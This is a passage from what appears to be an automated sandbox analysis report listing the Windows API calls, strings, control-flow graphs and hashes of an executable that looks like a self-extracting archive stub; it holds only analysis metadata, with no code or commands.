                                                            • _swprintf.LIBCMT ref: 00CD0D4A
                                                            • _swprintf.LIBCMT ref: 00CD0D96
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • AllocConsole.KERNEL32 ref: 00CD0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00CD0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00CD0DAF
                                                            • _wcslen.LIBCMT ref: 00CD0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CD0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00CD0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00CD0DE7
                                                            • FreeConsole.KERNEL32 ref: 00CD0DED
                                                            • ExitProcess.KERNEL32 ref: 00CD0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: 54abafdbe20e90ec84e5d34637c08f693bfadec972dff4449f6c91ed416def6d
                                                            • Instruction ID: 88fac597f94b39c890bacd6e7a90e1782c3308493ea4fed0ef081fe67e66b801
                                                            • Opcode Fuzzy Hash: 54abafdbe20e90ec84e5d34637c08f693bfadec972dff4449f6c91ed416def6d
                                                            • Instruction Fuzzy Hash: 09D152F14183C8BBDB659F54C849BAFBBE8AF85704F50491EF38596250CBB08649CB63

                                                            Control-flow Graph

                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CDC744
                                                              • Part of subcall function 00CDB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CDB3FB
                                                            • _wcslen.LIBCMT ref: 00CDCA0A
                                                            • _wcslen.LIBCMT ref: 00CDCA13
                                                            • SetWindowTextW.USER32(?,?), ref: 00CDCA71
                                                            • _wcslen.LIBCMT ref: 00CDCAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 00CDCBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 00CDCC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00CDCC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,00D0A472), ref: 00CDCC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CDCC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: 7ced57b9d40a36eb31721d8d7fb1a1b314e661118f840360119377b285b5e9f4
                                                            • Instruction ID: ad2e6d5ee8039148ba8fc4a5a06468c1bedcf734e20bb20036a211b9adc8f1be
                                                            • Opcode Fuzzy Hash: 7ced57b9d40a36eb31721d8d7fb1a1b314e661118f840360119377b285b5e9f4
                                                            • Instruction Fuzzy Hash: 68E160B2900259AADB25DBA4DD85EEE73BCAB04310F0040A7F719E7250EF749F85DB61
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CCDA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CCDAAC
                                                              • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                              • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                              • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010456), ref: 00CD1BA0
                                                            • _wcslen.LIBCMT ref: 00CCDDE9
                                                            • __fprintf_l.LIBCMT ref: 00CCDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: 9491fc9e2b735270febd95306e59a5ad1e0ecc2614d0db62d6a1ad9155f1aea7
                                                            • Instruction ID: 8bef2f5362f6f36bed33b5595a108d5226be16f9609852e2329ae2571c6bf6c3
                                                            • Opcode Fuzzy Hash: 9491fc9e2b735270febd95306e59a5ad1e0ecc2614d0db62d6a1ad9155f1aea7
                                                            • Instruction Fuzzy Hash: 9132D071900258ABCF24EF68C845FEE77A5EF15300F44016EFA1697281EBB1EE85DB90

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            • GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \

                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00CDD7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 00CDD8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 00CDD91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00CDD959
                                                            • CloseHandle.KERNEL32(?), ref: 00CDD97F
                                                            • ShowWindow.USER32(?,00000001), ref: 00CDD9E1
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CE5695,00CE5695,?,?,?,00CEABAC,00000001,00000001,2DE85006), ref: 00CEA9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CEABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CEAA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CEAB35
                                                            • __freea.LIBCMT ref: 00CEAB42
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            • __freea.LIBCMT ref: 00CEAB4B
                                                            • __freea.LIBCMT ref: 00CEAB70
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:

                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00CE3C35,?,?,00D22088,00000000,?,00CE3D60,00000004,InitializeCriticalSectionEx,00CF6394,InitializeCriticalSectionEx,00000000), ref: 00CE3C03
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-

                                                            APIs
                                                              • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                              • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            • OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                            • SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                            Similarity
                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                            • String ID: riched20.dll$3To

                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CC7760,?,00000005,?,00000011), ref: 00CC995F
                                                            • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC996C
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CC7760,?,00000005,?), ref: 00CC99A2
                                                            • GetLastError.KERNEL32(?,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99AA
                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC99F9
                                                            Similarity
                                                            • API ID: File$CreateErrorLast$Time
                                                            • String ID:

                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                            • IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                            • TranslateMessage.USER32(?), ref: 00CDB5AC
                                                            • DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            Similarity
                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                            • String ID:

                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000050), ref: 00CDABC2
                                                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CDABF9
                                                              • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CDABE9
                                                            Similarity
                                                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                            • String ID: EDIT
                                                            • API String ID: 4243998846-3080729518

                                                            Control-flow Graph

                                                            control_flow_graph 1071 cddbde-cddc09 call cdec50 SetEnvironmentVariableW call cd0371 1075 cddc0e-cddc12 1071->1075 1076 cddc14-cddc18 1075->1076 1077 cddc36-cddc38 1075->1077 1078 cddc21-cddc28 call cd048d 1076->1078 1081 cddc1a-cddc20 1078->1081 1082 cddc2a-cddc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                            Strings
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439

                                                            Control-flow Graph

                                                            control_flow_graph 1083 cc9785-cc9791 1084 cc979e-cc97b5 ReadFile 1083->1084 1085 cc9793-cc979b GetStdHandle 1083->1085 1086 cc97b7-cc97c0 call cc98bc 1084->1086 1087 cc9811 1084->1087 1085->1084 1091 cc97d9-cc97dd 1086->1091 1092 cc97c2-cc97ca 1086->1092 1089 cc9814-cc9817 1087->1089 1093 cc97ee-cc97f2 1091->1093 1094 cc97df-cc97e8 GetLastError 1091->1094 1092->1091 1095 cc97cc 1092->1095 1097 cc980c-cc980f 1093->1097 1098 cc97f4-cc97fc 1093->1098 1094->1093 1096 cc97ea-cc97ec 1094->1096 1099 cc97cd-cc97d7 call cc9785 1095->1099 1096->1089 1097->1089 1098->1097 1100 cc97fe-cc9807 GetLastError 1098->1100 1099->1089 1100->1097 1102 cc9809-cc980a 1100->1102 1102->1099
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00CC9795
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CC97AD
                                                            • GetLastError.KERNEL32 ref: 00CC97DF
                                                            • GetLastError.KERNEL32 ref: 00CC97FE
                                                            Similarity
                                                            • API ID: ErrorLast$FileHandleRead
                                                            • String ID:
                                                            • API String ID: 2244327787-0
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00CE3F73,00000000,00000000,?,00CEACDB,00CE3F73,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue), ref: 00CEAD66
                                                            • GetLastError.KERNEL32(?,00CEACDB,00CE3F73,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000,00000364,?,00CE98B7), ref: 00CEAD72
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CEACDB,00CE3F73,00000000,00000000,00000000,?,00CEAED8,00000006,FlsSetValue,00CF7970,FlsSetValue,00000000), ref: 00CEAD80
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CCD343,00000001,?,?,?,00000000,00CD551D,?,?,?), ref: 00CC9F9E
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CD551D,?,?,?,?,?,00CD4FC7,?), ref: 00CC9FE5
                                                            • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CCD343,00000001,?,?), ref: 00CCA011
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            APIs
                                                              • Part of subcall function 00CCC27E: _wcslen.LIBCMT ref: 00CCC284
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA2D9
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA30C
                                                            • GetLastError.KERNEL32(?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA329
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CEB8B8
                                                            Strings
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00CEAFDD
                                                            Strings
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CEA56F), ref: 00CEAF55
                                                            Strings
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDEAF9
                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                            Strings
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: 3To
                                                            • API String ID: 1269201914-245939750
                                                            APIs
                                                              • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CEBA89,?,00000000), ref: 00CEBC64
                                                            • GetCPInfo.KERNEL32(00000000,00CEBA89,?,?,?,00CEBA89,?,00000000), ref: 00CEBC77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CC9A50,?,?,00000000,?,?,00CC8CBC,?), ref: 00CC9BAB
                                                            • GetLastError.KERNEL32(?,00000000,00CC8411,-00009570,00000000,000007F3), ref: 00CC9BB6
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            APIs
                                                              • Part of subcall function 00CE97E5: GetLastError.KERNEL32(?,00D01030,00CE4674,00D01030,?,?,00CE3F73,00000050,?,00D01030,00000200), ref: 00CE97E9
                                                              • Part of subcall function 00CE97E5: _free.LIBCMT ref: 00CE981C
                                                              • Part of subcall function 00CE97E5: SetLastError.KERNEL32(00000000,?,00D01030,00000200), ref: 00CE985D
                                                              • Part of subcall function 00CE97E5: _abort.LIBCMT ref: 00CE9863
                                                              • Part of subcall function 00CEBB4E: _abort.LIBCMT ref: 00CEBB80
                                                              • Part of subcall function 00CEBB4E: _free.LIBCMT ref: 00CEBBB4
                                                              • Part of subcall function 00CEB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CEBA44,?), ref: 00CEB7E6
                                                            • _free.LIBCMT ref: 00CEBA9F
                                                            • _free.LIBCMT ref: 00CEBAD5
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC1E55
                                                              • Part of subcall function 00CC3BBA: __EH_prolog.LIBCMT ref: 00CC3BBF
                                                            • _wcslen.LIBCMT ref: 00CC1EFD
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CC9F27,?,?,00CC771A), ref: 00CC96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CC9F27,?,?,00CC771A), ref: 00CC9716
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CC9EC7
                                                            • GetLastError.KERNEL32 ref: 00CC9ED4
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            APIs
                                                            • _free.LIBCMT ref: 00CE8E75
                                                              • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CECA2C,00000000,?,00CE6CBE,?,00000008,?,00CE91E0,?,?,?), ref: 00CE8E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D01098,00CC17CE,?,?,00000007,?,?,?,00CC13D6,?,00000000), ref: 00CE8EB1
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00CD10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CD10B2
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00CF2641,000000FF), ref: 00CDACB0
                                                            • OleUninitialize.OLE32(?,?,?,?,00CF2641,000000FF), ref: 00CDACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA254
                                                              • Part of subcall function 00CCBB03: _wcslen.LIBCMT ref: 00CCBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CCA23A,?,00CC755C,?,?,?,?), ref: 00CCA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00CDDEEC
                                                              • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00CDDF03
                                                              • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                              • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                              • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010456,?), ref: 00CDB59E
                                                              • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                              • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CDA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CE2BB5
                                                            Memory Dump Source
